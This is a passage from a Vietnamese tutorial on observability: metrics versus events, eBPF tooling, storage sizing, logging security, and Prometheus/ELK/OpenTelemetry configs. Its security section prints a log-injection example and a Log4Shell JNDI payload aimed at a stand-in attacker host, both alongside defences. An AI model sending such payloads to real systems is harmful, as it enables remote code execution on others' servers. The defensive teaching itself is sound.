- Single tool, single query language
2.11.3 So sánh: Metrics vs Structured Events
| Metrics (Prometheus) | Structured Events (Honeycomb-style) | |
|---|---|---|
| Storage cost/event | ~16 bytes (TSDB optimized) | ~1-5KB (full event) |
| Cardinality | Thấp (~10K series/host) | Vô tận (mỗi event độc lập) |
| Aggregation | Pre-aggregated (P99 over 1m bucket) | On-the-fly (compute từ events) |
| Drill-down | Limited (chỉ labels có sẵn) | Unlimited (mọi field) |
| Cost | Cheap | Đắt hơn (mỗi event lưu full) |
| Best for | High-volume, low-cardinality (CPU, network) | High-cardinality, business logic insight |
Lưu ý: Không phải thay thế hoàn toàn — complementary. Metrics vẫn cho infrastructure. Events cho application/business.
2.11.4 OpenTelemetry Span Events — Best of both
OpenTelemetry traces + span attributes có thể act như structured events. Mỗi span có thể attach unlimited attributes:
import os

from opentelemetry import trace

tracer = trace.get_tracer(__name__)

@app.post("/checkout")
def checkout(user_id, items):
    with tracer.start_as_current_span("checkout") as span:
        # Set rich attributes (high-cardinality OK in traces)
        span.set_attribute("user.id", user_id)
        span.set_attribute("user.tier", get_user_tier(user_id))
        span.set_attribute("user.country", get_user_country(user_id))
        span.set_attribute("checkout.item_count", len(items))
        span.set_attribute("checkout.total_amount", calculate_total(items))
        span.set_attribute("feature.new_pricing", flag_enabled("new_pricing"))
        span.set_attribute("deploy.version", os.getenv("APP_VERSION"))
        # ... business logic
        return result
Sample rate: Trace data đắt hơn metrics → sample. Default: 1-10% sampling rate. Tail-based sampling: keep 100% errors + slow requests + 1% normal.
2.11.5 Vendors & tools
| Tool | Approach | Best for |
|---|---|---|
| Honeycomb | Native high-card events | Pioneer, best UX |
| Datadog APM | Metrics + Traces + Logs in 1 platform | Enterprise, full-stack |
| New Relic | Same | Established |
| Grafana Tempo + Loki | OSS traces + logs | Self-hosted, cost-conscious |
| Lightstep / ServiceNow | Microservice deep dive | Microservice-heavy |
| OpenTelemetry + ClickHouse | DIY | Maximum flexibility |
Tham chiếu:
- Observability Engineering (Charity Majors, Liz Fong-Jones, George Miranda, O’Reilly 2022) — https://www.honeycomb.io/observability-engineering-oreilly-book
- Charity Majors blog: https://charity.wtf/
2.12 eBPF Observability — Kernel-level Visibility
Cập nhật 2024-2026: eBPF-based observability (Pixie, Cilium Hubble, Parca) cung cấp visibility ở mức kernel mà không cần instrument application code.
2.12.1 Vấn đề của instrumentation truyền thống
Application-level instrumentation (OpenTelemetry SDK, Datadog agent):
- Phải modify code (add SDK, decorators, middleware)
- Language-specific: Python SDK ≠ Go SDK ≠ Rust SDK
- Performance overhead: 1-10% CPU, depends on sampling
- Doesn’t see kernel/network internals: TCP retransmits, syscall delays, scheduler latency
2.12.2 eBPF — Observability Without Code Changes
eBPF programs chạy trong kernel, observe mọi syscall, network packet, function call. Không cần modify application.
┌──────────────────────────────┐
│ Application (no SDK needed) │
│ user-space syscall │
└─────────────┬────────────────┘
│
▼
┌──────────────────────────────┐
│ Linux Kernel │
│ ┌────────────────────────┐ │
│ │ eBPF probes attached │ │
│ │ - kprobes (kernel fn) │ │
│ │ - uprobes (user fn) │ │
│ │ - tracepoints │ │
│ │ - XDP (network) │ │
│ └─────────┬──────────────┘ │
└────────────┼─────────────────┘
│ ring buffer
▼
┌──────────────────────────────┐
│ User-space collector │
│ → Send to backend │
└──────────────────────────────┘
Ưu điểm:
| Lợi ích | Chi tiết |
|---|---|
| Zero code changes | Deploy DaemonSet, instant visibility cho mọi pod |
| Language-agnostic | Works cho Python, Go, Rust, Java, C++, anything |
| Kernel + network visibility | TCP retransmits, syscall latency, page faults — invisible từ app |
| Low overhead | < 1% CPU typical |
| Production-safe | Verifier ensure no infinite loops, no kernel panic |
Nhược điểm:
| Hạn chế | Chi tiết |
|---|---|
| Linux-only | Không chạy trên Windows/Mac (servers OK) |
| Kernel version requirement | eBPF features cần kernel 4.18+ (CO-RE: 5.5+) |
| Privileged | Cần CAP_BPF hoặc privileged container |
| Symbol resolution | Stripped binary → kernel không biết function name |
2.12.3 eBPF Tools
| Tool | Use case | URL |
|---|---|---|
| Pixie (CNCF) | Auto-instrument Kubernetes apps | https://px.dev/ |
| Cilium Hubble | Network observability | https://docs.cilium.io/en/stable/gettingstarted/hubble/ |
| Parca | Continuous profiling | https://www.parca.dev/ |
| Pyroscope | Profiling | https://pyroscope.io/ |
| bcc tools | CLI tools (e.g., tcpconnect, biolatency) | https://github.com/iovisor/bcc |
| bpftrace | DTrace-like for eBPF | https://github.com/iovisor/bpftrace |
2.12.4 Ví dụ thực tế: Pixie auto-tracing
# Install Pixie on K8s cluster
px deploy
# Run pre-built scripts (no code change needed)
px run px/http_data
# → Sees ALL HTTP requests in cluster, including method, path, latency, status
px run px/mysql_data
# → Sees ALL MySQL queries with timings
px run px/dns
# → Sees DNS resolution latency
Magic: Không có instrumentation code nào. Pixie attach eBPF probes vào kernel → intercept syscalls → reconstruct application protocols (HTTP, gRPC, MySQL, Redis…).
2.12.5 Continuous Profiling với Parca/Pyroscope
Profiling truyền thống chỉ chạy on-demand (perf, pprof). Continuous profiling capture profile mọi thời điểm với negligible overhead.
Always-on profile → flame graph → identify CPU hotspots, memory leaks, lock contention
ở mức code line, no extra instrumentation
Use case:
- Tìm CPU hotspot ở production (1% function chiếm 30% CPU)
- Phát hiện memory leak (function X đang giữ bộ nhớ tăng dần)
- Debug performance regression sau deploy (compare profile pre/post)
Tham chiếu:
- Brendan Gregg, BPF Performance Tools (O’Reilly 2019) — bible của eBPF observability
- Liz Rice, Learning eBPF (O’Reilly 2023) — beginner-friendly
- Cilium documentation: https://docs.cilium.io/
2.12.6 Khi nào dùng eBPF vs Application Instrumentation?
Need business-level metrics (revenue, user_id, feature_flag)?
├─ YES → Application instrumentation (OpenTelemetry SDK)
└─ NO → Need infrastructure/network visibility?
├─ YES → eBPF (Pixie, Cilium Hubble, Parca)
└─ Both → Use complementary
Best practice 2024-2026 stack:
- OpenTelemetry SDK — application traces với business attributes
- Prometheus — infrastructure metrics (CPU, memory, network)
- eBPF observability (Pixie/Hubble) — kernel/network deep dive
- Continuous profiling (Parca/Pyroscope) — code-level performance
- Structured events backend (Honeycomb, ClickHouse) — high-cardinality drill-down
3. Estimation — Ước lượng Storage cho Monitoring Stack
3.1 Metrics Storage (TSDB Sizing)
Assumptions:
| Thông số | Giá trị |
|---|---|
| Số services | 50 |
| Metrics per service | 200 (avg, bao gồm custom + runtime + infra) |
| Unique label combinations per metric | 10 (avg) |
| Scrape interval | 15 giây |
| Bytes per sample | 16 bytes (timestamp 8B + value 8B) |
| Retention | 30 ngày |
| Compression ratio | 1.37 bytes/sample (sau compression, Prometheus real-world) |
Tổng số time series: 50 services × 200 metrics × 10 label combinations = 100,000 series
Samples per day: 100,000 series × (86,400s / 15s) = 100,000 × 5,760 ≈ 576 triệu samples/ngày
Storage per day (sau compression): 576 triệu samples × 1.37 bytes ≈ 790 MB ≈ 0.8 GB/ngày
Storage cho 30 ngày retention: 0.8 GB/ngày × 30 ≈ 24 GB
Nhận xét: 100K series, 30 ngày retention → chỉ cần ~25GB. Prometheus single node hoàn toàn handle được. Nhưng nếu cardinality explosion lên 10M series → 2.3TB/30d → cần Thanos/Cortex/Mimir cho long-term storage.
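Một sketch nhỏ để em tự chạy lại phép tính trên và thấy cardinality explosion ảnh hưởng storage thế nào (các con số đầu vào là assumptions ở bảng trên):
def tsdb_storage_gb(services, metrics_per_service, label_combos,
                    scrape_interval_s=15, bytes_per_sample=1.37, retention_days=30):
    series = services * metrics_per_service * label_combos
    samples_per_day = series * 86_400 / scrape_interval_s
    return samples_per_day * bytes_per_sample * retention_days / 1e9   # đổi ra GB

print(f"{tsdb_storage_gb(50, 200, 10):,.0f} GB")      # ~24 GB cho 30 ngày (100K series)
print(f"{tsdb_storage_gb(50, 200, 1000):,.0f} GB")    # ~2,367 GB ≈ 2.3 TB khi nổ lên 10M series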
3.2 Log Storage Sizing
Assumptions:
| Thông số | Giá trị |
|---|---|
| Tổng QPS (tất cả services) | 10,000 req/s |
| Log lines per request | 5 (avg: access log, app log, DB query log, etc.) |
| Average log line size | 500 bytes (structured JSON) |
| Retention | 90 ngày |
| Elasticsearch index overhead | 10% (inverted index, doc values) |
Log volume per day: 10,000 req/s × 5 lines × 500 bytes = 25 MB/s × 86,400s ≈ 2.16 TB/ngày (raw)
Sau Elasticsearch compression (~70% ratio, thực tế): 2.16 TB × ~0.3 ≈ 0.65 TB/ngày
Storage cho 90 ngày retention: 0.65 TB/ngày × 90 ≈ 58 TB, cộng ~10% index overhead ≈ 64 TB
Nhận xét: 10K QPS → cần ~64TB Elasticsearch storage cho 90 ngày. Đây là lý do:
- Log sampling cần thiết (không log 100% requests)
- Log levels quan trọng (production chỉ nên log WARN+ normally, DEBUG khi cần)
- Hot/Warm/Cold architecture trong Elasticsearch (SSD cho 7d, HDD cho 90d, S3 cho archive)
- Loki rẻ hơn vì không full-text index
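Tương tự, một sketch nhỏ kiểm tra lại con số ~64TB (compression còn ~30% và index overhead 10% là assumptions như trên):
def log_storage_tb(qps, lines_per_req, bytes_per_line, retention_days,
                   compression=0.30, index_overhead=0.10):
    raw_per_day = qps * lines_per_req * bytes_per_line * 86_400          # bytes/ngày (raw)
    stored_per_day = raw_per_day * compression * (1 + index_overhead)    # sau nén + inverted index
    return stored_per_day * retention_days / 1e12                        # đổi ra TB

print(f"{log_storage_tb(10_000, 5, 500, 90):.0f} TB")    # ~64 TB cho 90 ngày
print(f"{log_storage_tb(10_000, 5, 500, 7):.0f} TB")     # chỉ giữ 7 ngày hot: ~5 TB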
3.3 Alert Threshold Calculation
Ví dụ: Tính threshold cho error rate alert dựa trên SLO
Assumptions:
- SLO: 99.9% availability (30 ngày)
- Error budget: 0.1% = 43.2 phút downtime / tháng
Burn rate thresholds (threshold = burn rate × error budget 0.1%):
| Alert | Burn Rate | Error Rate Threshold | Window |
|---|---|---|---|
| P1 | 14.4x | 1.44% | 5 phút |
| P2 | 6x | 0.6% | 30 phút |
| P3 | 1x | 0.1% | 6 giờ |
Latency threshold calculation:
Nếu SLO: 99% requests < 200ms (P99 latency target) → latency error budget = 1% requests được phép chậm hơn 200ms.
Alert khi burn rate > 14.4x: 14.4 × 1% = 14.4% requests vượt 200ms.
→ Alert khi hơn 14.4% requests chậm hơn 200ms trong window 5 phút.
4. Security — Bảo mật trong Monitoring & Logging
4.1 Log Injection Attacks
Mô tả: Attacker chèn malicious content vào input, input đó được log, và khi admin xem log trong Kibana/web UI → trigger XSS hoặc làm sai lệch log.
Ví dụ tấn công:
# Attacker gửi username:
username = "admin\n2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin"
# Trong plaintext log, dòng giả xuất hiện như log thật:
2024-01-15 10:30:45 ERROR Login failed user=admin
2024-01-15 10:30:45 INFO Login successful user=admin role=superadmin ← FAKE!
Log4Shell (CVE-2021-44228) — một trong những vulnerabilities nghiêm trọng nhất lịch sử:
# Attacker gửi header:
User-Agent: ${jndi:ldap://attacker.com/exploit}
# Log4j resolve JNDI lookup → download + execute malicious code
# → Remote Code Execution (RCE) trên server
Phòng chống:
| Biện pháp | Chi tiết |
|---|---|
| Structured logging | Dùng JSON — field values được escape tự động, không thể inject newlines |
| Input sanitization | Strip control characters (\n, \r, \t) trước khi log |
| Parameterized logging | logger.info("Login failed", extra={"user": user_input}) thay vì logger.info(f"Login failed user={user_input}") |
| Update dependencies | Log4j >= 2.17.1, patch JNDI lookup |
| Output encoding | Kibana/Grafana Loki auto-escape HTML, nhưng custom dashboards cần encode |
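Sketch nhỏ minh hoạ hai biện pháp đầu trong bảng (structured logging + strip control characters) bằng Python thuần; tên logger và format chỉ là ví dụ:
import json
import logging
import re
import sys

logger = logging.getLogger("auth-service")
logger.addHandler(logging.StreamHandler(sys.stdout))
logger.setLevel(logging.INFO)

CONTROL_CHARS = re.compile(r"[\x00-\x1f\x7f]")   # \n, \r, \t, ESC...

def sanitize(value: str) -> str:
    """Strip control characters để attacker không chèn được dòng log giả."""
    return CONTROL_CHARS.sub(" ", value)

def log_event(level: int, message: str, **fields):
    """Structured logging: user input nằm trong field JSON riêng, không nối thẳng vào message."""
    entry = {"message": message, **{k: sanitize(str(v)) for k, v in fields.items()}}
    logger.log(level, json.dumps(entry))

# Attacker gửi username chứa newline → bị strip + escape trong JSON, không tạo được log giả
log_event(logging.WARNING, "Login failed",
          user="admin\n2024-01-15 10:30:45 INFO Login successful user=admin")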
4.2 PII (Personally Identifiable Information) in Logs
Vấn đề: Logs chứa PII vi phạm GDPR, CCPA, PDPA (VN). Ví dụ:
{
"message": "Payment processed",
"user_email": "[email protected]",
"credit_card": "4111-1111-1111-1111",
"ip_address": "113.160.234.56",
"phone": "+84901234567"
}
Giải pháp multi-layer:
| Layer | Technique | Ví dụ |
|---|---|---|
| Application | Redact/mask tại source code | credit_card: "****1111" |
| Pipeline | Logstash/Fluentd filter | mutate { gsub => ["message", "\d{4}-\d{4}-\d{4}-\d{4}", "****REDACTED****"] } |
| Storage | Field-level encryption trong ES | Encrypt user_email field |
| Access | RBAC trên Kibana | Chỉ Security team thấy full PII |
| Retention | Auto-delete PII sau 30 ngày | ILM policy trong Elasticsearch |
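Sketch minh hoạ layer Application (redact tại source code) bằng Python; các regex tương tự filter Logstash bên dưới và chỉ mang tính minh hoạ, production cần test kỹ hơn:
import re

PATTERNS = {
    "card":  (re.compile(r"\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b"), "[CARD_REDACTED]"),
    "email": (re.compile(r"\b[\w.%+-]+@[\w.-]+\.[A-Za-z]{2,}\b"), "[EMAIL_REDACTED]"),
    "phone": (re.compile(r"\b(0|\+84)\d{9,10}\b"), "[PHONE_REDACTED]"),
}

def redact(text: str) -> str:
    """Mask PII ngay tại application, trước khi log rời khỏi process."""
    for pattern, replacement in PATTERNS.values():
        text = pattern.sub(replacement, text)
    return text

print(redact("Payment by [email protected], card 4111-1111-1111-1111, phone 0901234567"))
# → Payment by [EMAIL_REDACTED], card [CARD_REDACTED], phone [PHONE_REDACTED]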
Logstash PII Filter Example:
filter {
# Mask credit card numbers
mutate {
gsub => [
"message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
"message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Z|a-z]{2,}\b", "[EMAIL_REDACTED]",
"message", "\b\d{3}[-.]?\d{3}[-.]?\d{4}\b", "[PHONE_REDACTED]"
]
}
# Remove sensitive fields entirely
mutate {
remove_field => ["password", "secret", "token", "authorization"]
}
}
4.3 Secure Log Transport
| Risk | Mitigation |
|---|---|
| Eavesdropping (nghe lén log in transit) | TLS 1.3 cho mọi log shipping (Filebeat → Logstash, Logstash → ES) |
| Tampering (sửa log) | Digital signature / HMAC cho log entries; Append-only storage |
| Log forging (tạo log giả) | Mutual TLS (mTLS) giữa log shipper và collector — chỉ trusted agents gửi log |
| Replay attack | Timestamp + nonce trong log entries |
Filebeat TLS config:
output.logstash:
hosts: ["logstash.internal:5044"]
ssl.enabled: true
ssl.certificate_authorities: ["/etc/pki/ca.crt"]
ssl.certificate: "/etc/pki/filebeat.crt"
ssl.key: "/etc/pki/filebeat.key"
ssl.verification_mode: "full" # Verify server cert
4.4 Access Control for Monitoring Dashboards
Monitoring dashboards chứa thông tin cực kỳ nhạy cảm: architecture, traffic patterns, error details, internal endpoints. Nếu bị leak → attacker có blueprint của hệ thống.
| Control | Implementation |
|---|---|
| Authentication | SSO (SAML/OIDC) cho Grafana/Kibana — KHÔNG dùng default admin/admin |
| Authorization (RBAC) | Grafana: Viewer/Editor/Admin per org. Kibana: Spaces + Roles |
| Network | Dashboard chỉ accessible qua VPN hoặc internal network |
| Audit | Log mọi dashboard access, query execution, alert changes |
| Data masking | Dashboard cho non-security team không hiển thị IP, user_id chi tiết |
4.5 Audit Trail for Monitoring Changes
Mọi thay đổi trong monitoring system phải được audit:
| Action | Audit Record |
|---|---|
| Alert rule created/modified/deleted | Who, when, old value → new value |
| Dashboard modified | Git-based provisioning (Grafana as Code) |
| Silence/inhibit created | Who silenced, duration, reason |
| Log retention policy changed | Approval workflow required |
| Access granted to monitoring | RBAC change log |
Compliance requirement: SOC 2, PCI-DSS, HIPAA đều yêu cầu audit trail cho monitoring system changes. Nếu ai đó silence critical alert rồi thực hiện attack → audit trail là evidence.
5. DevOps — Full Monitoring Stack Setup
5.1 Prometheus + Grafana + Alertmanager Stack
docker-compose-monitoring.yml:
version: "3.8"
networks:
monitoring:
driver: bridge
volumes:
prometheus_data: {}
grafana_data: {}
alertmanager_data: {}
services:
# ============================================================
# PROMETHEUS - Metrics Collection & Storage
# ============================================================
prometheus:
image: prom/prometheus:v2.50.0
container_name: prometheus
restart: unless-stopped
ports:
- "9090:9090"
volumes:
- ./prometheus/prometheus.yml:/etc/prometheus/prometheus.yml:ro
- ./prometheus/alert-rules.yml:/etc/prometheus/alert-rules.yml:ro
- prometheus_data:/prometheus
command:
- "--config.file=/etc/prometheus/prometheus.yml"
- "--storage.tsdb.path=/prometheus"
- "--storage.tsdb.retention.time=30d"
- "--storage.tsdb.retention.size=50GB"
- "--web.enable-lifecycle" # Enable /-/reload endpoint
- "--web.enable-admin-api" # Enable admin API (careful in prod!)
- "--storage.tsdb.min-block-duration=2h"
- "--storage.tsdb.max-block-duration=2h"
networks:
- monitoring
deploy:
resources:
limits:
memory: 4G
cpus: "2"
# ============================================================
# ALERTMANAGER - Alert Routing & Notification
# ============================================================
alertmanager:
image: prom/alertmanager:v0.27.0
container_name: alertmanager
restart: unless-stopped
ports:
- "9093:9093"
volumes:
- ./alertmanager/alertmanager.yml:/etc/alertmanager/alertmanager.yml:ro
- alertmanager_data:/alertmanager
command:
- "--config.file=/etc/alertmanager/alertmanager.yml"
- "--storage.path=/alertmanager"
- "--cluster.advertise-address=0.0.0.0:9093"
networks:
- monitoring
# ============================================================
# GRAFANA - Visualization & Dashboards
# ============================================================
grafana:
image: grafana/grafana:10.3.0
container_name: grafana
restart: unless-stopped
ports:
- "3000:3000"
environment:
- GF_SECURITY_ADMIN_USER=admin
- GF_SECURITY_ADMIN_PASSWORD=${GRAFANA_ADMIN_PASSWORD:-changeme}
- GF_USERS_ALLOW_SIGN_UP=false
- GF_AUTH_ANONYMOUS_ENABLED=false
- GF_SERVER_ROOT_URL=https://grafana.example.com
- GF_SMTP_ENABLED=true
- GF_SMTP_HOST=smtp.gmail.com:587
- GF_LOG_LEVEL=warn
volumes:
- grafana_data:/var/lib/grafana
- ./grafana/provisioning/datasources:/etc/grafana/provisioning/datasources:ro
- ./grafana/provisioning/dashboards:/etc/grafana/provisioning/dashboards:ro
- ./grafana/dashboards:/var/lib/grafana/dashboards:ro
networks:
- monitoring
# ============================================================
# NODE EXPORTER - Host Metrics (CPU, Memory, Disk, Network)
# ============================================================
node-exporter:
image: prom/node-exporter:v1.7.0
container_name: node-exporter
restart: unless-stopped
ports:
- "9100:9100"
volumes:
- /proc:/host/proc:ro
- /sys:/host/sys:ro
- /:/rootfs:ro
command:
- "--path.procfs=/host/proc"
- "--path.rootfs=/rootfs"
- "--path.sysfs=/host/sys"
- "--collector.filesystem.mount-points-exclude=^/(sys|proc|dev|host|etc)($$|/)"
networks:
- monitoring
# ============================================================
# cADVISOR - Container Metrics
# ============================================================
cadvisor:
image: gcr.io/cadvisor/cadvisor:v0.49.1
container_name: cadvisor
restart: unless-stopped
ports:
- "8080:8080"
volumes:
- /:/rootfs:ro
- /var/run:/var/run:ro
- /sys:/sys:ro
- /var/lib/docker/:/var/lib/docker:ro
- /dev/disk/:/dev/disk:ro
privileged: true
devices:
- /dev/kmsg:/dev/kmsg
networks:
- monitoring
prometheus/prometheus.yml:
global:
scrape_interval: 15s # Default scrape interval
evaluation_interval: 15s # Rule evaluation interval
scrape_timeout: 10s
# Alertmanager configuration
alerting:
alertmanagers:
- static_configs:
- targets:
- alertmanager:9093
# Load alert rules
rule_files:
- "alert-rules.yml"
# Scrape targets
scrape_configs:
# Prometheus self-monitoring
- job_name: "prometheus"
static_configs:
- targets: ["localhost:9090"]
# Node Exporter (host metrics)
- job_name: "node-exporter"
static_configs:
- targets: ["node-exporter:9100"]
# cAdvisor (container metrics)
- job_name: "cadvisor"
static_configs:
- targets: ["cadvisor:8080"]
# Application services (example)
- job_name: "app-services"
metrics_path: "/metrics"
scrape_interval: 10s
static_configs:
- targets:
- "api-gateway:8080"
- "user-service:8081"
- "payment-service:8082"
- "order-service:8083"
labels:
env: "production"
# Kubernetes service discovery (khi dùng k8s)
# - job_name: "kubernetes-pods"
# kubernetes_sd_configs:
# - role: pod
# relabel_configs:
# - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_scrape]
# action: keep
# regex: true
# - source_labels: [__meta_kubernetes_pod_annotation_prometheus_io_path]
# action: replace
# target_label: __metrics_path__
# regex: (.+)
alertmanager/alertmanager.yml:
global:
resolve_timeout: 5m
smtp_from: "[email protected]"
smtp_smarthost: "smtp.gmail.com:587"
smtp_auth_username: "[email protected]"
smtp_auth_password: "${SMTP_PASSWORD}"
smtp_require_tls: true
# Notification templates
templates:
- "/etc/alertmanager/templates/*.tmpl"
# Alert routing tree
route:
receiver: "slack-default"
group_by: ["alertname", "severity", "service"]
group_wait: 30s # Wait before sending first notification
group_interval: 5m # Wait between grouped notifications
repeat_interval: 4h # Repeat if not resolved
routes:
# P1 Critical → PagerDuty + Slack
- match:
severity: critical
receiver: "pagerduty-critical"
group_wait: 10s
repeat_interval: 1h
continue: true # Also send to next matching route
- match:
severity: critical
receiver: "slack-critical"
# P2 High → Slack #incidents
- match:
severity: high
receiver: "slack-incidents"
repeat_interval: 2h
# P3 Warning → Slack #alerts
- match:
severity: warning
receiver: "slack-alerts"
repeat_interval: 8h
# Security alerts → Security team
- match:
category: security
receiver: "security-team"
group_wait: 0s
repeat_interval: 30m
# Inhibition rules (suppress lower severity when higher fires)
inhibit_rules:
- source_match:
severity: "critical"
target_match:
severity: "warning"
equal: ["alertname", "service"]
- source_match:
severity: "critical"
target_match:
severity: "high"
equal: ["alertname", "service"]
# Receivers
receivers:
- name: "slack-default"
slack_configs:
- api_url: "${SLACK_WEBHOOK_DEFAULT}"
channel: "#monitoring"
title: '[{{ .Status | toUpper }}] {{ .GroupLabels.alertname }}'
text: '{{ range .Alerts }}*{{ .Annotations.summary }}*\n{{ .Annotations.description }}\n{{ end }}'
send_resolved: true
- name: "slack-critical"
slack_configs:
- api_url: "${SLACK_WEBHOOK_CRITICAL}"
channel: "#incidents"
title: '🚨 CRITICAL: {{ .GroupLabels.alertname }}'
text: >-
{{ range .Alerts }}
*Service*: {{ .Labels.service }}
*Summary*: {{ .Annotations.summary }}
*Runbook*: {{ .Annotations.runbook_url }}
{{ end }}
send_resolved: true
- name: "slack-incidents"
slack_configs:
- api_url: "${SLACK_WEBHOOK_INCIDENTS}"
channel: "#incidents"
send_resolved: true
- name: "slack-alerts"
slack_configs:
- api_url: "${SLACK_WEBHOOK_ALERTS}"
channel: "#alerts"
send_resolved: true
- name: "pagerduty-critical"
pagerduty_configs:
- service_key: "${PAGERDUTY_SERVICE_KEY}"
severity: critical
description: '{{ .GroupLabels.alertname }}: {{ .CommonAnnotations.summary }}'
details:
service: '{{ .GroupLabels.service }}'
severity: '{{ .GroupLabels.severity }}'
runbook: '{{ .CommonAnnotations.runbook_url }}'
- name: "security-team"
slack_configs:
- api_url: "${SLACK_WEBHOOK_SECURITY}"
channel: "#security-alerts"
pagerduty_configs:
- service_key: "${PAGERDUTY_SECURITY_KEY}"
severity: critical
5.2 ELK Stack Docker Compose
docker-compose-elk.yml:
version: "3.8"
networks:
elk:
driver: bridge
volumes:
elasticsearch_data: {}
logstash_pipeline: {}
services:
# ============================================================
# ELASTICSEARCH - Log Storage & Search Engine
# ============================================================
elasticsearch:
image: docker.elastic.co/elasticsearch/elasticsearch:8.12.0
container_name: elasticsearch
restart: unless-stopped
environment:
- discovery.type=single-node
- cluster.name=monitoring-cluster
- bootstrap.memory_lock=true
- "ES_JAVA_OPTS=-Xms2g -Xmx2g"
- xpack.security.enabled=true
- xpack.security.enrollment.enabled=true
- ELASTIC_PASSWORD=${ELASTIC_PASSWORD:-changeme}
# ILM (Index Lifecycle Management) for log rotation
- xpack.monitoring.collection.enabled=true
ulimits:
memlock:
soft: -1
hard: -1
volumes:
- elasticsearch_data:/usr/share/elasticsearch/data
ports:
- "9200:9200"
networks:
- elk
deploy:
resources:
limits:
memory: 4G
# ============================================================
# LOGSTASH - Log Processing Pipeline
# ============================================================
logstash:
image: docker.elastic.co/logstash/logstash:8.12.0
container_name: logstash
restart: unless-stopped
volumes:
- ./logstash/pipeline/logstash.conf:/usr/share/logstash/pipeline/logstash.conf:ro
- ./logstash/config/logstash.yml:/usr/share/logstash/config/logstash.yml:ro
ports:
- "5044:5044" # Beats input
- "5000:5000" # TCP input (for direct log shipping)
- "9600:9600" # Monitoring API
environment:
- "LS_JAVA_OPTS=-Xms1g -Xmx1g"
depends_on:
- elasticsearch
networks:
- elk
# ============================================================
# KIBANA - Log Visualization
# ============================================================
kibana:
image: docker.elastic.co/kibana/kibana:8.12.0
container_name: kibana
restart: unless-stopped
environment:
- ELASTICSEARCH_HOSTS=http://elasticsearch:9200
- ELASTICSEARCH_USERNAME=kibana_system
- ELASTICSEARCH_PASSWORD=${KIBANA_PASSWORD:-changeme}
- xpack.security.enabled=true
- xpack.encryptedSavedObjects.encryptionKey=${KIBANA_ENCRYPTION_KEY}
ports:
- "5601:5601"
depends_on:
- elasticsearch
networks:
- elk
# ============================================================
# FILEBEAT - Log Shipper (chạy trên mỗi host)
# ============================================================
filebeat:
image: docker.elastic.co/beats/filebeat:8.12.0
container_name: filebeat
restart: unless-stopped
user: root
volumes:
- ./filebeat/filebeat.yml:/usr/share/filebeat/filebeat.yml:ro
- /var/lib/docker/containers:/var/lib/docker/containers:ro
- /var/log:/var/log:ro
depends_on:
- logstash
networks:
- elk
logstash/pipeline/logstash.conf:
input {
beats {
port => 5044
ssl => true
ssl_certificate_authorities => ["/etc/pki/ca.crt"]
ssl_certificate => "/etc/pki/logstash.crt"
ssl_key => "/etc/pki/logstash.key"
ssl_verify_mode => "force_peer"
}
tcp {
port => 5000
codec => json_lines
}
}
filter {
# ============================
# Parse JSON logs
# ============================
if [message] =~ /^\{/ {
json {
source => "message"
target => "parsed"
}
mutate {
rename => {
"[parsed][level]" => "log_level"
"[parsed][service]" => "service_name"
"[parsed][trace_id]" => "trace_id"
"[parsed][span_id]" => "span_id"
"[parsed][duration_ms]" => "duration_ms"
}
}
}
# ============================
# PII Redaction (CRITICAL!)
# ============================
mutate {
gsub => [
# Credit card numbers
"message", "\b\d{4}[-\s]?\d{4}[-\s]?\d{4}[-\s]?\d{4}\b", "[CARD_REDACTED]",
# Email addresses
"message", "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b", "[EMAIL_REDACTED]",
# Vietnamese phone numbers
"message", "\b(0|\+84)\d{9,10}\b", "[PHONE_REDACTED]",
# SSN-like patterns
"message", "\b\d{3}-\d{2}-\d{4}\b", "[SSN_REDACTED]"
]
}
# Remove explicitly sensitive fields
mutate {
remove_field => ["password", "secret", "token", "authorization", "cookie",
"[parsed][password]", "[parsed][secret]", "[parsed][token]"]
}
# ============================
# Enrich with geo data (optional)
# ============================
if [client_ip] {
geoip {
source => "client_ip"
target => "geo"
}
}
# ============================
# Log injection protection
# ============================
mutate {
gsub => [
# Remove ANSI escape codes
"message", "\e\[[0-9;]*m", "",
# Remove null bytes
"message", "\x00", ""
]
}
# ============================
# Add metadata
# ============================
mutate {
add_field => {
"environment" => "${ENV:production}"
"pipeline_version" => "2.0"
}
}
}
output {
elasticsearch {
hosts => ["elasticsearch:9200"]
user => "elastic"
password => "${ELASTIC_PASSWORD}"
ssl => true
index => "logs-%{[service_name]}-%{+YYYY.MM.dd}"
ilm_enabled => true
ilm_rollover_alias => "logs"
ilm_policy => "logs-lifecycle"
}
# Debug output (disable in production)
# stdout { codec => rubydebug }
}
5.3 OpenTelemetry Collector Configuration
otel-collector-config.yml:
receivers:
# OTLP receiver (gRPC + HTTP)
otlp:
protocols:
grpc:
endpoint: 0.0.0.0:4317
http:
endpoint: 0.0.0.0:4318
cors:
allowed_origins: ["*"]
# Prometheus receiver (scrape Prometheus-format metrics)
prometheus:
config:
scrape_configs:
- job_name: "otel-collector"
scrape_interval: 15s
static_configs:
- targets: ["localhost:8888"]
# Host metrics receiver
hostmetrics:
collection_interval: 30s
scrapers:
cpu: {}
memory: {}
disk: {}
network: {}
load: {}
processors:
# Batch processor (buffer before export)
batch:
timeout: 5s
send_batch_size: 1024
send_batch_max_size: 2048
# Memory limiter (prevent OOM)
memory_limiter:
check_interval: 1s
limit_mib: 1024
spike_limit_mib: 256
# Attributes processor (add common attributes)
attributes:
actions:
- key: environment
value: "production"
action: upsert
- key: deployment.version
value: "v2.1.0"
action: upsert
# Filter processor (drop noisy/unwanted telemetry)
filter:
error_mode: ignore
traces:
span:
- 'attributes["http.target"] == "/health"'
- 'attributes["http.target"] == "/metrics"'
- 'attributes["http.target"] == "/readyz"'
# Tail sampling (keep interesting traces, sample boring ones)
tail_sampling:
decision_wait: 10s
num_traces: 50000
expected_new_traces_per_sec: 1000
policies:
# Always keep error traces
- name: errors-policy
type: status_code
status_code: {status_codes: [ERROR]}
# Always keep slow traces (> 1s)
- name: latency-policy
type: latency
latency: {threshold_ms: 1000}
# Sample 10% of successful traces
- name: probabilistic-policy
type: probabilistic
probabilistic: {sampling_percentage: 10}
exporters:
# Export traces to Jaeger
otlp/jaeger:
endpoint: jaeger:4317
tls:
insecure: true
# Export metrics to Prometheus
